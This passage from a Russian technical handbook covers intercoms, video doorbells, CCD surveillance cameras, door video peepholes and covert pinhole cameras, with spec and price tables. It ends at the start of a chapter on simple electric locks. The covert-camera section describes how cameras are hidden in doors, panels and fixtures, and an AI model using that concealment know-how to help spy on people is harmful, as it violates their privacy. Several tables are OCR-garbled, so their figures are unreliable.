В беспроводных домофонных системах передача звуковых сообщений происходит по промышленной сети питания 220 В, 50 Гц. Сообщения передаются на высокой частоте (ВЧ), что обеспечивает наилучшую фильтрацию слабого полезного сигнала на фоне шумов промышленной сети. Следовательно, каждая станция (блок переговорного устройства) включает в свой состав несколько разнесенных по частоте генераторов ВЧ колебаний (по числу пользователей), модуляторы звукового сигнала и приемники ВЧ сигналов по числу каналов. К беспроводным домофонным системам можно подключить ограниченное количество абонентов. В состав таких систем входит, как правило, 2—4 станции.
К основным преимуществам беспроводных домофонов можно отнести простоту подключения и возможность быстрого изменения структуры системы, а так же возможность установки переговорного устройства у входной двери офиса или квартиры без прокладки дополнительного кабеля.
В настоящее время ряд ведущих фирм, вышеупомянутая фирма Commax, Urmet Domus (Италия) и др., предлагают беспроводные системы связи с высоким качеством воспроизведения передаваемых сообщений. В качестве примера рассмотрим беспроводные системы связи фирмы Commax (рис. 4. 13), которые имеют следующие характеристики:
> возможность подключения от 2 до 4 станций;
> мелодичный сигнал вызова;
> вызов любой из станций и обеспечение полной конфиденциальности разговора;
> низкая стоимость (от 38 USD за комплект для 2 абонентов).
В качестве примера назначение органов управления на передней панели беспроводной станции WI-4C приведено на рис. 4. 14.
Рис. 4. 13. Беспроводные системы внутренней связи.
Рис. 4. 14 Назначение органов управления на передней панели беспроводной станции WI-4C
Для установления связи достаточно нажать кнопку выбора абонента на панели управления станции, при этом загорится индикатор выбранного канала. Далее следует нажать кнопку вызова абонента и приступить к разговору, так как микрофон и громкоговоритель находятся внутри корпуса переговорного устройства. На рис. 4. 15 показаны возможные варианты установления связи для системы WI-3SN, а типовая схема подключения 4-х станций к промышленной сети 220 В, 50 Гц приведена на рис. 4. 16.
Рис. 4. 15. Возможные варианты установления связи для системы WI-3SN
Рис. 4. 16. Типовая схема подключения станций
4. 2. Видеодомофонные устройства
Системы и устройства видеоконтроля получили развитие в связи с созданием миниатюрных видеокамер и видеомагнитофонов. История применения фотокамер насчитывает более 100 лет, но на практике применение видеотехники сдерживалось неприемлемыми ее весогабаритными характеристиками. В настоящее время габариты видеокамер могут быть меньше самых миниатюрных фотокамер. Применение приборов видеотехники в системах наблюдения дает несомненные преимущества перед приборами фото- и кинотехники. Прежде всего, это возможность осуществления оперативной записи информации, передачи ее на достаточно большие расстояния и анализа в реальном масштабе времени.
В последнее время солидные фирмы и учреждения для ограничения доступа посторонних лиц все чаще используют видеопереговорные устройства (видеодомофоны). Данные устройства имеют современный дизайн, высокое качество воспроизведения видео- и звуковых сигналов. Также как и аудиодомофоны, видеопереговорные системы строятся по модульному принципу (рис. 4. 17). Это позволяет гибко изменять конфигурацию системы по желанию пользователя. Данные устройства включают в себя видеоканал наблюдения и аудиодомофонное устройство. Поэтому видеодомофонные устройства обладают всеми функциональными возможностями, присущими аудиопереговорным устройствам, особенности применения которых были описаны в разделе 4. 1.
Видеоканал наблюдения видеодомофонного устройства включает в себя миниатюрную видеокамеру, вмонтированную в переговорную панель, и телефонный интерфейс, обеспечивающий передачу изображении на видеоконтрольное устройство (рис. 4. 18).
В качестве примера видеоконтрольного устройства фирмы Urmet Domus на рис. 4. 19 приведены видеомодули модели 1732.
Некоторые видеодомофонные устройства, помимо оперативной телефонной связи и управления электрозамком входной двери, по видеоканалу наблюдения обеспечивают:
> постоянный или периодический осмотр контролируемой зоны (лестничной площадки, входа в дом);
> возможность разговора и визуального наблюдения за посетителем;
Рис. 4. 17. Видеодомофоны фирмы Commax
> возможность ведения автоматической видеозаписи до 8-ми последних посетителей с регистрацией времени (модель DN-583R);
> возможность включения ИК подсветки для идентификации посетителей в условиях плохой освещенности;
> возможность просмотра телевизионных программ по монитору (телевизору) при отсутствии вызова по видеопереговорному устройству. Монитор (телевизор) принимает телевизионные передачи в системах NTSC, PAL, SECAM.
Современные видеодомофонные устройства имеют оригинальный внешний вид и различное конструктивное исполнение. Например, в комплект поставки видеодомофонов моделей DN-283 и WY-350 входит черно-белый телевизор с диагональю 13 см, на экране которого отображается изображение посетителя в течение 30 с после звонка с переговорной панели, если не поднята телефонная трубка аппарата. Видеокамера в переговорной панели обеспечивает угол обзора 74° по горизонтали, 55° по вертикали и формирует четкое изображение даже при освещенности объекта 1 лк.
Рис. 4. 18. Возможная конфигурация современных видеодомофонных устройств
Рис. 4. 19. Видеомодули модели 1732
Основные технические характеристики некоторых зарубежных и отечественных видеодомофонов с ИК подсветкой приведены в табл. 4. 2.
Таблица 4. 2. Основные технические характеристики видеодомофонов
Наименование изделия |
KVM-602 KVC-F100 S200 |
KVM-604 KVC-F100 S200 |
KVM-500F KVC-F100 S200 |
DN-283 |
DN-583R |
DPV-2ME |
DPV4ME |
ТВД-21 |
Фирма-изготовитель |
Kocom |
Kocom |
Kocom |
Dyne |
Dyne |
Commax |
Commax |
Тахион |
Размер монитора по диагонали, см |
10 |
10 |
10 |
13 |
10 |
10 |
10 |
любой монитор |
Угол обзора видеокамеры: - по горизонтали, град; - по вертикали, град |
74 |
74 |
50 |
74 |
74 |
72 |
72 |
140 |
55 |
55 |
38 |
55 |
55 |
55 |
55 |
140 |
|
Минимальная освещенность объекта, лк |
1 |
1 |
2 |
1 |
1 |
0, 5 |
0, 5 |
0, 1 |
Проводная связь (количество жил кабеля) |
2 |
2 |
4 |
4 |
4 |
2 |
4 |
ВЧ-кабель |
Диапазон рабочих температур,С |
от-10 до+ 50 |
от-10 до+ 50 |
от-10 до+ 50 |
от-10 до+ 50 |
от-10 до+ 50 |
от-10 до+ 50 |
от-10 до+ 50 |
от-40 до+ 50 |
Примерная стоимость, USD |
353 |
359 |
359 |
355 |
480 |
350 |
328 |
290 |
ГЛАВА 5 ТЕЛЕВИЗИОННЫЕ СИСТЕМЫ НАБЛЮДЕНИЯ
Нет необходимости напоминать об огромной важности использования видеотехники для обеспечения безопасности различных объектов. В настоящее время на российском рынке предлагается огромный выбор разнообразных видеоустройств для самых различных применений. Зачастую потребителю сложно разобраться, какими должны быть конфигурация охранной видеосистемы наблюдения, ее состав и характеристики используемого в ней оборудования. Поэтому будет не лишним уделить немного внимания и времени для ознакомления с принципами работы и построения видеосистем, а также усвоить терминологию, используемую для описания их характеристик.
Основным компонентом систем телевизионного наблюдения является видеокамера, предназначенная для преобразования оптического изображения в электрический телевизионный сигнал, пригодный для передачи и воспроизведения. Одним из основных элементов видеокамеры является датчик изображения, т. е. устройство преобразования спроецированного объективом оптического изображения наблюдаемого объекта в электрический сигнал (рис. 5. 1). Как правило, в качестве такого датчика используются передающие телевизионные трубки и твердотельные преобразователи свет-сигнал.
Рис. 5. 1. Преобразование оптического изображения в электрический сигнал
Передающая телевизионная трубка — это электронно-лучевой прибор. В зависимости от конструкции эти приборы называют видиконами, глетиконами (плюмбиконами), ньювиконами и т. п. Основными элементами передающей телевизионной трубки являются мишень и электронный прожектор. Последний предназначен для формирования узкого электронного пучка, падающего перпендикулярно мишени. Мишень, состоящая из сигнальной пластины и полупроводникового фотопроводящего слоя, нанесена на внутреннюю поверхность передней стенки баллона передающей трубки. Особенность фотослоя мишени заключается в том, что она обладает внутренним фотоэффектом — под действием подающего на мишень света изменяется электропроводность фотослоя. Благодаря этому, на мишени создается и хранится потенциальный рельеф, соответствующий входному оптическому сигналу.
Электрический сигнал снимается с сигнальной пластины, представляющей собой довольно тонкий слой двуокиси олова или индия.
Все известные передающие телевизионные трубки объединяет наличие фотопроводящей мишени, малые габариты и масса, небольшое число регулировок, достаточно высокая чувствительность и разрешающая способность. Разрешающая способность оценивается по наименьшему расстоянию между двумя точками, при котором их изображения еще не сливаются. Это расстояние выражается в линейных или угловых мерах. Величина, обратная этому расстоянию, служит количественной мерой разрешающей способности оптических приборов.
В последнее время все большее применение находят твердотельные преобразователи свет-сигнал. Это фоточувствительные приборы с зарядовой связью (ПЗС). Практически все современные телевизионные малогабаритные камеры наблюдения строятся на основе матричных ПЗС. Поверхность матрицы ПЗС состоит из множества светочувствительных ячеек — пикселов (обычно от 270 000 до 440 000). Чем большее количество пикселов размещается на матрице ПЗС, тем выше качество и четкость получаемого изображения. Как правило, разрешающая способность по горизонтали таких камер составляет 330—600 твл (телевизионных линий). Этот
Рис. 5. 2. Зависимость угла обзора от формата матрицы ПЗС
Рис. 5. 3. Размеры матриц ПЗС различных форматов
параметр приводится в паспортных данных на камеру. Разрешение по вертикали всех камер одинаково, ибо ограничено стандартом на количество строк разложения — 625 строк.
Размер матрицы ПЗС определяется ее форматом. Формат — это диагональный размер видикона, формирующего изображение, эквивалентное изображению, формируемому матрицей ПЗС. Формат измеряется в дюймах и принимает значения 1/2", 1/3", 1/4" и т. п. Формат матрицы определяет угол обзора телевизионной камеры (рис. 5. 2)
С одинаковыми объективами телевизионная камера на основе матрицы формата 1/2" имеет больший угол обзора, чем камера с матрицей формата 1/3".
Чем меньше формат матрицы ПЗС, тем миниатюрнее камера. Соотношение размера матрицы ПЗС и ее размеров в миллиметрах показано на рис. 5. 3.
Для увеличения угла обзора матрицы малого формата должны иметь объектив с малым фокусным расстоянием. При этом качество телевизионного изображения будет определяться светосилой объектива, т. е. количеством света, которое будет проходить через него и попадать на преобразователь свет-сигнал. Чем выше светосила объектива, тем меньше нужно времени для освещения матрицы ПЗС до получения изображения необходимого качества. Светосила объектива зависит от двух величин: диаметра входного зрачка D и фокусного расстояния f. Отношение диаметра входного зрачка объектива к фокусному расстоянию называется относительным отверстием F и записывается, например, в виде F: 1, 6 или F: 1/б. Светосила объектива тем выше, чем больше диаметр его входного зрачка и меньше фокусное расстояние.
Следующий важный параметр ТВ камеры — ее чувствительность. Производители по-разному трактуют это понятие. Одни под чувствительностью понимают минимальную освещенность объекта, при которой еще можно различить черно-белые переходы на изображении, другие — минимальную освещенность на матрице ПЗС. С технической точки зрения более правильно было бы указывать освещенность на матрице ПЗС, т. к. в этом случае не нужно оговаривать характеристики используемого объектива. Но пользователю при установке камеры удобнее работать с освещенностью объекта, которую он заранее знает. Поэтому в паспортных данных ТВ камер обычно указывают минимальную освещенность объекта, например 0, 1 лк (люкс).
Спектральная чувствительность черно-белых ТВ камер перекрывает и инфракрасную область спектра. Это позволяет использовать их в условиях плохой освещенности, применяя специальные ИК осветители.
Электронный затвор является неотъемлемой частью ТВ камеры на основе матрицы ПЗС. Точнее, когда говорят о той или иной скорости электронного затвора, подразумевают соответствующий режим работы матрицы ПЗС камеры. Скорость электронного затвора является одной из основных характеристик видеокамеры и определяет качество воспроизведения быстро перемещающихся объектов. В современных камерах используют затворы со скоростью срабатывания от 1/50 до 1/10000 с.
В настоящее время быстрыми темпами развиваются методы цифровой обработки видеосигнала. В таких системах аналоговый сигнал, снимаемый с матрицы ПЗС, проходит через аналого-цифровой преобразователь, размещенный внутри ТВ камеры. Затем сигнал разделяется на яркостную и цветовую компоненты, обрабатывается микропроцессором и поступает на цифровой монитор. Это позволяет существенно улучшить разрешение и качество изображения.
Телевизионные системы наблюдения можно рассматривать как надежный охранный комплекс вашего офиса, учреждения, квартиры.
Системы скрытного охранного телевизионного наблюдения имеют четыре основных направления применения (рис. 5. 4):
> переговорная панель домофона со скрытой телевизионной камерой наблюдения;
> телевизионный дверной глазок;
> скрытая миниатюрная телевизионная камера наблюдения;
> вынесенная телевизионная камера наблюдения.
Скрытые телевизионные камеры и телевизионный дверной глазок (снаружи выглядит, как обычный дверной глазок) монтируются в дверь или переговорную
Рис. 5. 4. Применение телекамер в составе охранной системы
панель домофона. Эти системы телевизионного наблюдения с целью повышения качества наблюдаемых объектов имеют небольшое фокусное расстояние и угол обзора объектива до 160°. Для идентификации объектов в темное время суток совместно с телекамерами используются устройства инфракрасной подсветки (длина волны 870 нм). В табл. 5. 1 приведены устройства инфракрасной подсветки, получившие широкое применение в системах телевизионного наблюдения.
Таблица 5. 1. Устройства инфракрасной подсветки
Модель |
Фирма (страна) |
Сектор подсветки, град. |
Дальность подсветки, м |
Питание, В/А |
Примерная цена, USD |
ФОТ-1 |
Текра (Россия) |
120 |
4 |
12 /0, 4 |
30 |
IR-20F |
Computar (Япония) |
27 |
12 |
12 /1, 7 |
240 |
IR-50F |
Computar (Япония) |
27 |
30 |
12/4, 2 |
310 |
IR-75F |
Computar (Япония) |
25 |
40 |
12/6, 25 |
390 |
IR-150F |
Computar (Япония) |
25 |
80 |
12/10 |
662 |
5. 1. Телевизионные дверные глазки
Дверной видеоглазок — это специальная миниатюрная телевизионная камера черно-белого изображения, предназначенная для дистанционного наблюдения за обстановкой перед входной дверью квартиры, офиса, дачи по экрану телевизора или видеомонитора. По внешнему виду с наружной стороны двери он ничем не отличается от обычного дверного глазка. Устанавливается видеоглазок на входные двери толщиной от 30 мм до 70 мм. Схема наблюдения может быть организована двумя способами:
> передача сигналов изображения (рис. 5. 5) происходит по радиоканалу в дециметровом (ДМВ) диапазоне волн на частотах 38—42 ТВ каналов, для преобразования видеосигнала в радиочастотный ТВ сигнал применяется передатчик телевизионных сигналов;
> передача сигналов изображения по кабелю на НЧ вход телевизора или
монитора (рис. 5. 6).
Телевизионные дверные глазки имеют различную конструкцию и предназначены для установки на дверях различного типа. Размещение видеоглазка на металлической двери производится аналогично установке обычного дверного глазка (рис. 5. 7, а).
Рис. 5. 5. Передача изображения по радиоканалу
Рис. 5. 6. Передача изображения по проводам
Пример монтажа видеоглазка на деревянной или сложной двери показан на рис. 5. 7, б.
Кроме видеоглазка можно установить скрытую видеокамеру. На металлической или деревянной двери скрытая телевизионная видеокамера устанавливается так, как показано на рис. 5. 7, в.
В некоторых дверных видеоглазках, например "Циклоп-2" (WAT-660), используется электронный затвор, позволяющий получать высококачественное изображение быстро перемещающихся объектов, а видеоглазок VG-3 предназначен для непосредственного подключения к передатчику телевизионных сигналов, в отличие от других, соединение которых с монитором или телевизором осуществляется посредством телевизионного кабеля.
Технические характеристики видеоглазков приведены в табл. 5. 2.
Таблица 5.2. Технические характеристики дверных видеоглазков
Наименование изделия |
«Циклоп-1» (СА-Н32С) |
«Циклоп-2» (WAT-660) |
VG-1 |
VG-2 |
VG-3 |
VG-4 |
«Циклоп-3» (VC-150) |
«Цикло11-4» (СА-Н34С) |
VS-160DG |
Разрешающая способность ТВ камеры, твл |
380 |
380 |
380 |
380 |
380 |
380 |
380 |
380 |
430 |
Минимальная освещенность, лк |
1 |
0,8 |
0,4 |
0,4 |
0,4 |
0,4 |
1 |
1 |
0,1 |
Формат матрицы ПЗС, дюйм |
1/3 |
- |
1/3 |
1/3 |
1/3 |
1/3 |
1/3 |
1/3 |
1/3 |
Угол обзора оъектива, град |
150 |
85 |
160 |
125 |
160 |
190 |
100 |
100 |
160 |
Напряжение питания, В |
9-12 |
9-9,5 |
9-11 |
9 11 |
9-11 |
9-11 |
12 |
12 -• |
12 |
Толщина двери, мм |
до 64 |
до 40 |
до 70 |
до 40 |
до 70 |
до 45 |
до 70 |
до 70 |
до 40 |
Диаметр отверстия в двери для установки объектива, мм |
22 |
16 |
20 |
22 |
30 |
22 |
20 |
40 |
23 |
Примерная цена, USD |
175 |
200 |
160 |
155 |
210 |
185 |
175 |
169 |
180 |
Рис. 5.7. Монтаж видеоглазка (а, 6) и скрытой телевизионной камеры (в)
5. 2. Скрытые видеокамеры наблюдения
Наиболее надежным способом получения необходимой информации является скрытое телевизионное наблюдение. В качестве скрытых камер наблюдения, в основном, используют бескорпусные и миниатюрные как черно-белые, так и цветные телевизионные камеры. Такие видеокамеры обеспечивают скрытый видеоконтроль служебных помещений, лестничной площадки, входной двери и т. п. и являются абсолютно незаметным, информативным и безопасным способом наблюдения. Эти камеры комплектуются объективом с вынесенным зрачком. Из-за малых размеров входного зрачка объектива маскировка бескорпусных и миниатюрных телевизионных камер может быть самой различной: во входной двери, в панелях переговорного устройства, в щитах пожарной сигнализации, в щитах и приборах освещения и т. д.
Термин «вынесенный входной зрачок» (Pin-Hole) применяют в тех случаях, когда плоскость апертурной диафрагмы совпадает с входным зрачком, находящимся перед передней линзой объектива. В обычных объективах входной зрачок находится внутри объектива.
В случае, когда у объектива вынесен входной зрачок, уменьшение отверстия входного зрачка или расположение его в плоскости каких-либо загораживающих предметов (сеток, щелей, и т. п.) не приводит к уменьшению угла поля зрения объектива, а лишь снижает его светосилу. В зависимости от конструктивных особенностей конкретного объектива вынос зрачка осуществляется на 0, 5—5, 0 мм.
Именно возможность установки на указанном расстоянии перед передней линзой маленьких отверстий, сеток или щелей и обеспечивает настоящую маскировку камеры для проведения скрытого наблюдения.
В качестве примера на рис. 5. 8 изображена черно-белая миниатюрная телевизионная камера JT-241S. Данная камера может работать с различными объективами, которые имеют вынесенный входной зрачок. Технические характеристики объективов с вынесенным зрачком приведены в табл. 5. 3.
Таблица 5. 3. Технические характеристики объективов с вынесенным зрачком
Тип объектива |
ivi-3 |
ivi-4 |
ivi-73 |
ivi-75 |
ivi-10 |
E.R-11 |
|||||||||
ivi-5 |
ivi-6 |
ivi-70 |
ivi-71 |
ivi-713 |
ivi-714 |
ivi-715 |
ivi-72 |
||||||||
Фокусное расстояние, мм |
6,6 |
7,7 |
8,5 |
7,7 |
3,6 |
3,(;4 |
4,4 |
3,11 |
3,34 |
4,3 |
6,5 |
5,0 |
19,56 |
1,43 |
|
Относительное отверстие |
F:2.2 |
F:1,9 |
F:2,0 |
F:3,2 |
F:3,0 |
F:3,6 |
F:4,4 |
F:3,9 |
F:4,0 |
F:3,5 |
F:5,0 |
F:5,0 |
F:2,0 |
F:1,8 |
|
УГОЛ обзора.объестива по диагонали/горизонтали/вертикали для камер с различными размерами ПЗС матрицы |
2/3" |
- |
84/48/68 |
112/60/86 |
- |
- |
- |
- |
- |
- |
- |
||||
1/2" |
90/46/65 |
70/40/54 |
60/34/46 |
70/43/56 |
- |
- |
- |
- |
- |
||||||
1/3" |
50/20/39 |
42/24/33 |
110/60/85 |
110/60/85 |
90/46/65 |
- |
125/70/90 |
86/46/62 |
50/30/39 |
65/39/52 |
16,5/9/12 |
- |
|||
1/4" |
- |
- |
- |
- |
- |
- |
- |
90/46/65 |
90/46/65 |
- |
- |
- |
- |
||
другие |
- |
- |
- |
- |
- |
- |
- |
- |
- |
- |
- |
- |
110 |
||
Диаметр входного зрачка (макс), мм |
3,0 |
4,0 |
4,2 |
2,4 |
1,2 |
1,0 |
1,0 |
0,8 |
0,8 |
1,2 |
1,2 |
1,0 |
9,5 |
0,8 |
|
Расстояние между входным зрачком и первой линзой объектива, мм |
0,8 |
6,5 |
0,8 |
0,8 |
0,25 |
0,55 |
1,21 |
0,7 |
0,5 |
1,5 |
2,5 |
0,1 |
12,0 |
0,1 |
|
Задний фокальный отрезок, мм |
5,7 |
5,54 |
5,05 |
5,28 |
2,57 |
2,08 |
2,62 |
2,52 |
2,08 |
2,08 |
2,84 |
2,0 |
18,83 |
1,09 |
|
Длина оптической системы, мм |
14,8 |
13,74 |
16,05 |
18,88 |
7,98 |
10,63 |
19,76 |
1028 |
10,0 |
10,05 |
15,03 |
- |
52,43 |
2,94 |
|
ЧКХ на пространственной частоте 100 лин/мм (в центре) |
0,12 |
0,11 |
0,05 |
0,1 |
0,5 |
0,5 |
0,7 |
0,69 |
0,69 |
0,58 |
0,62 |
0,4 |
0,76 |
0,05 |
|
Резьбовое соединение |
М12х0,5 |
М12х0,5 |
М12х0,5 |
М12х0,5 |
М7х0,5 |
М8х0,5 |
М12х0,5 |
М8х0,5 |
М12х0,5 |
М7х0,5 |
М7х0,75 |
М12х0,5 |
М12х0,5 |
0 4мм |
|
Вес, г |
3,9 |
4,8 |
5,7 |
6,4 |
1,7 |
2,6 |
4,1 |
3,8 |
2,1 |
2,2 |
2,5 |
2,1 |
24,2 |
0,9 |
Таблица 5.4. Бескорпусныс и миниатюрные черно-белые ПЗС-видеокамеры
PM200-L37 |
Computar (Япония) |
1/3 |
380 |
0,3 |
3,8 |
F:4,5 |
61 «Игольное ушко» |
32' 32' 18 |
9 |
196 , |
PM200-L38 |
Computar (Япония) |
1/3 |
380 |
0,3 |
3,8 |
F:2,0 |
63 |
32' 32' 18 |
9 |
16.3 |
PMH-200L-38 |
Computar (Япония) |
1/3 |
580 |
0,6 |
3,8 |
F:2,0 |
63 |
32'32' 23 |
9 |
280 |
SM-58 |
Тек pa (Россия) |
1/3 |
380 |
0,2 |
3,6 |
F:1,4 |
50 |
37' 37' 27 |
12 |
90 |
VC-150 |
Kocom (Юж. Корея) |
1/3 |
380 |
0,2 |
3,6 |
F:4,5 |
65, «Игольное ушко» |
32'32' 18 |
12 |
145 |
VS-160s |
Polestar (Юж. Корея) |
1/3 |
380 |
0,1 |
3,6 |
F:1,8 |
63 |
38' 38' 23 |
12 |
115 |
WAT-660D-G3. 8 |
Watec (Япония) |
1/4 |
380 |
0,8 |
3,8 |
F:2,0 |
51 |
30' 30- 16 |
9 |
190 |
WAT-660D-P3, 2 |
Watec (Япония) |
1/4 |
380 |
4 |
3,2 |
F:4,5 |
59, «Игольное ушко» |
30' 30' 16 |
9 |
206 |
WAT-660D-P3. 7 |
Watec (Япония) |
1/4 |
.380 |
4 |
3,7 |
F:4,5 |
ушко» |
30' 30'16 |
9 |
206 |
WAT-704R-P3. 7 |
Watec (Япония) |
1/4 |
380 |
0,8 |
3,7 |
F:4,5 |
52, «Игольное ушко» |
18'51 |
9 |
271 |
WAT-666GD |
Watec (Япония) |
1/4 |
380 |
1,6 |
3,8 |
F:2,0 |
«Потолочная» |
53 ' 46 |
9 |
280 |
WAT-903 |
Watec (Япония) |
1/3 |
350 |
2 |
5 |
F:1,6 |
67 |
40- 65-35 |
12 |
209 |
Рис. 5. 8. Миниатюрная телевизионная камера JT-241S
Миниатюрная телевизионная камера JT-241S со сменными объективами обеспечивает:
> наблюдение через входное отверстие диаметром 0, 3 —1, 2 мм с углом поля зрения до 110°;
> высокую чувствительность (0, 04 лк), позволяющую в темноте при инфракрасной подсветке видеть намного лучше, чем человеческий глаз;
> установку на любые элементы интерьера благодаря малым габаритным размерам телекамеры (39х39х20 мм);
> передачу телевизионного изображения по проводам, по оптико-волоконным жгутам и по радиоканалу (до 500 м при установке передатчика телевизионных сигналов);
> непрерывное скрытое наблюдение до 30 часов при установке автономного источника питания (аккумулятора);
> высокое качество изображения с разрешением 400 твл.
Миниатюрные телевизионные камеры по внешнему виду очень похожи друг на друга, поэтому кратко рассмотрим только их технические характеристики. Однако прежде отметим некоторую особенность их применения. Необходимо иметь в виду, что некоторые материалы, применяемые для маскировки объективов, типа "темное стекло", пропускают только небольшую часть видимого спектра и могут успешно работать при солнечном освещении, при освещении прожектором или обычными лампами накаливания. Но применение указанных материалов маскировки становится невозможным при освещении объекта более широкополосным источником света, например люминесцентными или галлогеновыми лампами.
Более подробно остановимся на технических характеристиках некоторых моделей телевизионных камер отечественного и зарубежного производства. В табл. 5. 4 приведены характеристики бескорпусных и миниатюрных черно-белых ТВ камер на основе матрицы ПЗС.
Таблица 5. 5. Бескорпусные и миниатюрные цветные ТВ камеры
Наименование изделия |
ХС-41 |
WAT-205A |
WAT-207A |
DC-2000P |
Фирма-изготовитель (страна) |
Computer (Япония) |
Watec (Япония) |
Watec (Япония) |
Polesta (Южная Корея) |
Формат матрицы ПЗС, дюйм |
1/2 |
1/4 |
1/4 |
1/3 |
Разрешение по горизонтали. твл |
320 |
320 |
320 |
420 |
Минимальная освещенность, лк |
10 |
8 |
Нет данных |
1 |
Фокусное расстояние объектива, мм |
4 |
3, 8 |
3, 8 |
Нет данных |
Относительное отверстие объектива |
F: 2, 0 |
F: 2, 0 |
F: 2, 0 |
Эл. затвор 1/50-1/100000 |
Угол обзора объектива (по горизонтали), град |
51 |
51 |
51 |
Нет данных |
Габаритные размеры, мм |
55х60х30 |
23, 3х22, 3х57, 5 |
45, 5х47х29, 5 |
40х28+ 45х45 |
Напряжение питания, В |
12 |
6 |
6 |
12 |
Примерная стоимость, USD |
520 |
570 |
541 |
320 |
Бескорпусные и миниатюрные цветные ТВ камеры на основе матрицы ПЗС на отечественном рынке представлены сравнительно небольшим ассортиментом. Отличительными особенностями цветных ТВ камер являются сравнительно большие габариты и высокая стоимость. В табл. 5. 4 приведены основные технические характеристики бескопусных и миниатюрных цветных ТВ камер.
5. 3. Телевизионные видеокамеры наблюдения
Обеспечить безопасность в современных условиях немыслимо без широкого использования технических средств. Однако сориентироваться в нынешнем изобилии различных телевизионных камер наблюдения очень сложно (рис. 5. 11). Телевизионные камеры наблюдения предназначены для видеоконтроля входных дверей, ворот, периметров и других объектов. Поэтому устанавливают их, как правило, на улице. В связи с этим к телевизионным камерам наблюдения предъявляются определенные требования по их конструктивному исполнению.
Телевизионная камера должна иметь законченную конструкцию для установки на внешних объектах при непосредственном контакте с окружающей средой без дополнительных защитных приспособлений. Корпус (гермобокс) телевизионной камеры наблюдения должен обеспечивать надежное функционирование оптики и электроники, особенно в плохих погодных условиях (дождь, снег и т. п.). Электронная схема термостабилизации должна обеспечивать постоянную температуру внутри термобокса (порядка+ 20°С) не зависимо от температуры наружного воздуха, а система обогрева стекла должна исключать его обмерзание в зимнее время. Телевизионная камера наблюдения должна обладать высокой чувствительностью, обеспечивать надежную идентификацию объектов при любых условиях освещенности и круглосуточный визуальный контроль охраняемого пространства. Помимо этого, потребляемый ток камеры от источника питания не должен превышать десяток-сотен миллиампер.
Кронштейны крепления и поворотные устройства телевизионных камер должны обладать повышенной механической прочностью и обеспечивать максимальную зону обзора.
Телевизионная камера наблюдения должна быть адаптирована к сложным российским климатическим условиям — диапазон рабочих температур должен быть от -40°С до+ 50°С.
Учитывая широкий спектр различных моделей ТВ ПЗС-видеокамер наблюдения на российском рынке, в качестве примера приведем технические характеристики только одного изделия каждой фирмы. Это позволит сориентироваться среди многообразия продукции ведущих фирм мира, занимающих главенствующее положение в данной области.
В табл. 5. 6 приведены основные технические характеристики отечественных и зарубежных черно-белых телевизионных видеокамер с электронным затвором.
В табл. 5. 7 приведены основные технические характеристики цветных телевизионных видеокамер с электронным затвором.
Рис. 5. 11. Телевизионные камеры наблюдения
Таблица 5. 6. Черно-белые телевизионные видеокамеры
Таблица 5. 7. Цветные телевизионные ПЗС-видеокамеры
Наименование изделия |
СС-312 |
CD-08 |
JAI-2080 |
NCD-5130 |
VTC-1400 |
WAT-202B |
WV-CP210 |
Фирма- изготовитель (страна) |
Polestar (Южная Корея) |
Computar (Япония) |
Jai (Япония) |
Vista (Япония) |
Santec (Германия-Тайвань) |
Watec (Япония) |
Panasonic (Япония) |
Формат матрицы ПЗС, дюйм |
1, 3 |
1/3 |
1/3 |
1/3 |
1/3 |
1/3 |
1/3 |
Разрешение по горизонтали, твл |
350 |
430 |
450 |
470 |
330 |
420 |
330 |
Минимальная освещенность, лк |
2 |
1 |
3 |
2, 2 |
2 |
3 |
1, 5 |
Фокусное расстояние объектива, м |
- |
6, 5 - 52 |
6-90 |
- |
- |
- |
- |
Относительное отверстие объектива |
- |
F: 1, 8 |
- |
- |
F: 1, 4 |
F: 1, 2 |
F: 1, 2 |
Габаритные размеры, мм |
- |
45х74х48 |
- |
- |
65х55х142 |
44х44х53 |
67х65х118 |
Напряжение питания, В |
+ 12 |
+ 12 |
+ 12 |
220 (+ 12) |
+ 12 |
+ 12 |
220 |
Примерная стоимость, USD |
380 |
1020 |
1780 |
687 |
440 |
715 |
580 |
ГЛАВА 6 ПРАКТИЧЕСКИЕ СХЕМЫ УСТРОЙСТВ СИГНАЛИЗАЦИИ И ОГРАНИЧЕНИЯ ДОСТУПА.
6. 1. Простейшие замки и ключи
Возможных вариантов построения электрических, магнитных и электронных замков и ключей существует великое множество. В этих устройствах в качестве исполнительного механизма обычно используется электромагнит постоянного или переменного тока. При подаче напряжения питания на обмотку электромагнита его сердечник втягивается внутрь и через механические тяги освобождает запирающее устройство замка двери.
6. 1. 1. Простейший электрический замок
Этот замок прост в изготовлении, содержит минимум деталей и практически не требует настройки. Принципиальная схема такого замка приведена на рис. 6. 1.
При нажатии на кнопку SB1 замыкается цепь питания обмотки электромагнита: плюс источника питания, обмотка электромагнита YA1, замкнутые контакты кнопки SB1, минус источника питания. Срабатывает электромагнит YA1, его сердечник втягивается внутрь и через механическую тягу приводит в действие засов замка двери. Вместо кнопки, использование которой по понятным причинам на
Рис. 6. 1 Однокнопочный замок
внешней стороне двери нецелесообразно, может быть использован геркон, подключенный к точкам А и В схемы вместо кнопки SB1. Геркон SA1 располагают скрытно в любом удобном месте на двери или стене. При приближении постоянного магнита к месту расположения геркона, его контакты замыкаются и электромагнит YA1 срабатывает. Кнопку SB1 и геркон SA1 можно включить и параллельно. В этом случае кнопку SB1 устанавливают внутри помещения и ее используют для дистанционного открывания двери изнутри. Геркон SA1 размещают так, как это было описано выше.
Кроме этого, секретным ключом такого замка может служить, например, проволочная перемычка, которой замыкают два контакта, замаскированные на наружной стороне двери или поблизости от нее. В качестве контактов можно использовать, например, разъем от аудиоаппаратуры типа СГ-1 или другие стандартные разъемы любого типа: круглые, плоские, с любым количеством контактов. В последнем случае используются обе части разъема: штыревая и гнездовая. Причем, чем больше штырьков в используемом разъеме, тем более сложную конфигурацию могут иметь перемычки в ключе (ответной части) и тем большей секретности замка можно достичь.
Для питания устройства лучше всего использовать источник постоянного тока с напряжением+ 12... 36 В. Применение более высокого напряжения нежелательно, т. к. требует хорошей изоляции цепей с целью соблюдения требований по технике безопасности. В качестве электромагнита может быть использован любой, подходящего размера, обеспечивающий необходимое тяговое усилие для открывания замка при используемом источнике питания.
6.1.2. Замок с магнитным ключом
Работа этого замка основана на использовании постоянных магнитов и герконов. Это позволяет получить надежные с точки зрения устойчивости работы замки и ключи. Принципиальная схема одного из таких замков представлена на рис. 6. 2.
Рис. 6. 2 Замок с магнитным ключом
